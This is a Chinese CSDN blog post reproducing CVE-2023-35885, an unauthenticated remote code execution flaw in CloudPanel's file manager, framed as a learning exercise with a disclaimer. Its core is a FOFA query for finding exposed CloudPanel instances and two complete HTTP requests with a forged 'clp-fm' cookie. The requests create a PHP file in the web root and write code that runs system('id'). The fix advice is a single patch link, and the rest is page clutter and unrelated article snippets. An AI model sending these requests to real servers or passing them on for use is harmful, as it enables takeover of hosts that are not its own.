【漏洞复现】CloudPanel makefile接口远程命令执行漏洞(CVE-2023-35885)

最新推荐文章于 2024-06-21 09:30:38 发布
最新推荐文章于 2024-06-21 09:30:38 发布
阅读量1k 收藏 8
点赞数 7
分类专栏: 漏洞复现 文章标签: CloudPanel
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46944519/article/details/135744553
版权

文章目录

前言

CloudPanel 是一个基于 Web 的控制面板或管理界面,旨在简化云托管环境的管理。它提供了一个集中式平台,用于管理云基础架构的各个方面,包括 (VM)、存储、网络和应用程序。

声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、CloudPanel 简介

CloudPanel 是一个基于 Web 的控制面板或管理界面,旨在简化云托管环境的管理。它提供了一个集中式平台,用于管理云基础架构的各个方面,包括 (VM)、存储、网络和应用程序。

二、漏洞描述

CloudPanel是CloudPanel开源的一款免费软件。用于配置和管理服务器。CloudPanel 2.3.1之前版本存在安全漏洞,该漏洞源于具有不安全的文件管理器cookie身份验证。

CVE编号:CVE-2023-35885
CNNVD编号:CNNVD-202306-1507

三、影响版本

CloudPanel 2.3.1之前版本
在这里插入图片描述

四、漏洞复现

FOFA:title=="CloudPanel | Log In"

漏洞链接:https://127.0.0.1/file-manager/backend/makefile

漏洞数据包

创建文件

POST /file-manager/backend/makefile HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=
Content-Length: 44
Content-Type: application/x-www-form-urlencoded

id=/htdocs/app/files/public/&name=test.php

写内容进文件

POST /file-manager/backend/text HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=
Content-Length: 85
Content-Type: application/x-www-form-urlencoded

id=/htdocs/app/files/public/test.php&content=<?php echo system('id');phpinfo();unlink(__FILE__)?>

访问创建的文件
在这里插入图片描述

五、修复建议

官方补丁 https://www.cloudpanel.io/docs/v2/changelog/

李火火安全阁
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CloudPanel RCE漏洞复现CVE-2023-35885
0xSec
01-19 842
由于2.3.1 之前的 CloudPanel 具有不安全的文件管理器 cookie 身份验证。未经身份验证的攻击者可以利用此问题在服务器上创建任意文件,创建PHP后门文件可远程代码执行,并且获取服务器权限。
ntpscanner:NTP monlist 扫描程序 CVE-2013-5211
07-07
然而,NTP也存在安全风险,其中CVE-2013-5211是一个著名的漏洞,该漏洞允许攻击者通过monlist命令获取大量NTP服务器的详细信息。 在CVE-2013-5211中,NTP服务器的一个特性被滥用,即monlist功能。monlist是NTP...
makefile之查漏补缺
chunlovenan的专栏
12-02 747
1.忽略命令的出错,我们可以在Makefile命令行前加一个减号“-”(在Tab键之后),标记为不管命令出不出错都认为是成功的。如:      clean:             -rm -f *.o
谷歌Cloud、Paly 中的XSS 漏洞可导致账户劫持
smellycat000的专栏
08-01 407
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Google Cloud、DevSite 和 Google Play 中存在几个漏洞,可导致攻击者实施跨站点脚本攻击,导致账户遭劫持。第一个漏洞是位于 Google DevSite 中的一个反射性 XSS。受攻击者控制的链接可在http://cloud.google.com 和 http://developers.goo...
MakeFile浅谈
关注互联网安全的小虾米一枚
02-20 4179
什么是makefile?或许很多Winodws 的程序员都不知道这个东西,因为那些Windows 的I DE都为你做了这 个工作,但我觉得要作一个好的和professional的程序员,makefile还是要懂。这就好像现在有这么多 的HTML的编辑器,但如果你想成为一个专业人士,你还是要了解HTML的标识的含义。特别在Unix下的软 件编译,你就不能不自己写makefile了,会不会写makef
CVE-2023-35843NocoDB 任意文件读取漏洞(CVE-2023-35843)
m0_46317063的博客
06-29 615
cve-2023-35843
Juniper Networks Junos OS EX远程命令执行漏洞(CVE-2023-36845)
weixin_44304678的博客
11-07 778
Juniper Networks Junos OS EX是美国瞻博网络(Juniper Networks)公司的一套专用于该公司的硬件设备的网络操作系统。Juniper Networks Junos OS EX存在安全漏洞,该漏洞源于J-Web模块存在PHP外部变量修改漏洞。22.3版本早于22.3R2-S2、22.3R3-S1;23.2版本早于23.2R1-S1、23.2R2。作者对使用该文章导致的任何直接或间接损失不承担任何责任。该文章仅用于授权测试,任何未经授权的测试均属于非法行为。
CVE-2019-0708-Poc.rar
05-23
CVE-2019-0708 POC,检测工具 C:. │ cve_2019_0708.rb │ Dockerfile │ LICENSE │ list.txt │ README.md │ screenshot.png │ 使用说明.txt │ ├─docker │ entrypoint.sh │ setup.sh │ └─rdesktop-...
terraform-makefileMakefile用作Terraform的简单接口
02-04
【文件名称列表】:“terraform-makefile-master” 这个列表表明了压缩包包含的是`terraform-makefile`项目的主分支或最新版本。用户解压后,可以查看源码、配置文件等,了解如何设置和使用Makefile来管理Terraform...
ansible-makefileMakefile用作Ansible的简单接口
01-31
然后,克隆或下载`ansible-makefile-master`压缩包,这包含了一个基本的Makefile示例。 2. **配置Makefile**:在Makefile中,你可以定义各种目标(targets),每个目标对应一个Ansible的playbook或任务。例如,你...
intellij-makefile:支持基于IntelliJ的IDE的Makefile
02-04
【压缩包子文件的文件名称列表】:“intellij-makefile-master”通常表示这是该插件的源代码仓库主分支的下载包,其中可能包含以下组件: 1. **源代码文件**:如`.kt`(Kotlin源码)文件,用于实现插件的功能。 2. *...
推荐一款创新服务器管理工具:CloudPanel
gitblog_00083的博客
06-21 301
推荐一款创新服务器管理工具:CloudPanel 项目地址:https://gitcode.com/cloudpanel_io/cloudpanel-ce 1、项目介绍 欢迎了解CloudPanel,这是一个免费且现代化的服务器控制面板,以简洁易用为设计理念,让服务器配置和管理工作变得轻而易举。无论你是新手还是经验丰富的系统管理员,CloudPanel 都能助你快速高效地部署和管理你的服务器资源。...
Cloud_panel
weixin_34375233的博客
02-10 63
传统基础架构应用程序的系统架构师,云计算应用程序的设计确实是相当有挑战性的工作。体现在应用程序架构师首先要了解云计算环境和传统基础架构的差异并且充分利用云计算平台的一些特点来更好的满足用户需求。 对于刚从传统应用架构转到云计算平台的应用架构师,我觉得理解下面四点非常重要: 1.运行环境的感知能力 传统的基础架构或系统平台中的资源一般都是不能动态配置,因此应用程序在设计的时候主要考虑自身的业务...
makefile的简单编写
apple_51801179的博客
05-06 5875
一.最简单makefile的编写 1.makefile的命名:makefile 2.makefile的规则:目标,依赖,命令 格式为: 第一行为目标:依赖(目标就是你要生成可执行文件的名字,依赖就是要编译的文件) 第二行,先开始有一个tab缩进。然后就是gcc的编译命令(注意开始有tab缩进) 当编写完makefile之后直接make就可以执行编译文件。 二.提升版makefile 以上就是最简单的makefile的编写。但是很容易发现这种...
国内国外常用的10个云服务器可视化管理面板
互联网那些事儿
08-04 7301
如今无论是搭建网站,还是部署小程序,甚至一些企业应用都会用到云服务求或者独立服务器。对于很多希望利用网站、网络创业的,也会用到服务器,不过在使用服务器过程中,我们对于服务器环境的配置,尤其是Web环境的部署面板,以及一些软件的安装,还是需要一些技术含量的。但是,如果我们借助一些第三方的运维软件工具,那是可以提高效率。在我们使用VPS和云服务器部署Web环境面板的时候,早年我们可能会去编译安装软件,但是如今我们可以使用可视化面板或者一键脚本。...
【墨菲安全实验室】Spring Cloud Gateway代码注入漏洞分析(CVE-2022-22947)
murphysec的博客
03-03 3977
漏洞简述 3月1日,VMware发布了针对Spring Cloud Gateway的漏洞通告,当actuator端点开启并对外暴露时,攻击者可以构造恶意请求实现远程任意代码执行。 Spring Cloud Gateway是Spring Cloud 生态中的API网关,包含限流、过滤等API治理功能。Actuator是Spring Boot生态中的应用监控组件,提供了通过http访问监控运行状态的能力。 当actuator端点开启时,可以通过http请求修改路由,路由中包含的filter参数会经过SPE
打败可道云!使用1Panel部署新一代WebOS(Win11风格)
skyhhjmk的博客
11-02 1334
桌面:桌面右键菜单:自带浏览器:应用商店:软件安装:刚刚安装的应用展示:安装这个可以在线编辑ppt、excel、word等:性能方面,就服务器监控面板来看,单人使用没多少性能消耗这些都是部署在上面的。
从简单的 XSS 到完整的 Google Cloud Shell 实例接管,值5000美元
smellycat000的专栏
10-13 434
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队本文说明的是以root身份接管Google Cloud Shell实例的漏洞奖励计划案例。如下是复现步骤:1、设置位于任...
开题报告宠物医院管理系统的设计与实现 已通过开题答辩的.docx
最新发布
07-25
随着人们生活水平的提高和精神需求的增加,宠物已经成为很多家庭的重要成员,宠物市场的规模和潜力也不断扩大。宠物医院作为宠物健康保障的重要机构,需要适应市场的发展和变化,提供更加专业和便捷的服务。宠物医院的业务和信息涉及多个方面,如科室信息、医生信息、坐诊信息、药品信息、挂号信息、网站公告信息等。如果采用传统的手工或半自动化的管理方式,会造成信息的分散、混乱、更新困难、查询不便等问题,影响管理的效率和质量。系统能够通过计算机技术和网络技术对宠物医院业务进行集中管理。它可以实现信息的录入、存储、查询、修改、删除、统计、分析、展示等功能,方便宠物医院的管理人员和工作人员进行业务操作和决策支持。宠物医院管理系统还可以利用网络技术,向宠物主人和宠物爱好者提供在线的服务和咨询,方便宠物主人和宠物爱好者了解和关爱自己的宠物,增强宠物医院的社会影响力和竞争力。综上所述,宠物医院管理系统是一个具有实际意义和应用价值的选题,它可以为宠物医院的管理和服务提供有效的支持,为宠物主人和宠物爱好者提供便捷的服务和咨询,为宠物的健康和福利做出贡献。
makefile命令filter -d% -i%
09-04
makefile命令filter -d% -i%的作用是过滤列表中满足指定条件的字符串。 -d%表示删除列表中以%结尾的字符串,而-i%表示仅保留列表中以%结尾的字符串。 这个命令Makefile中常用于对文件列表进行筛选,特别是在使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李火火安全阁

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值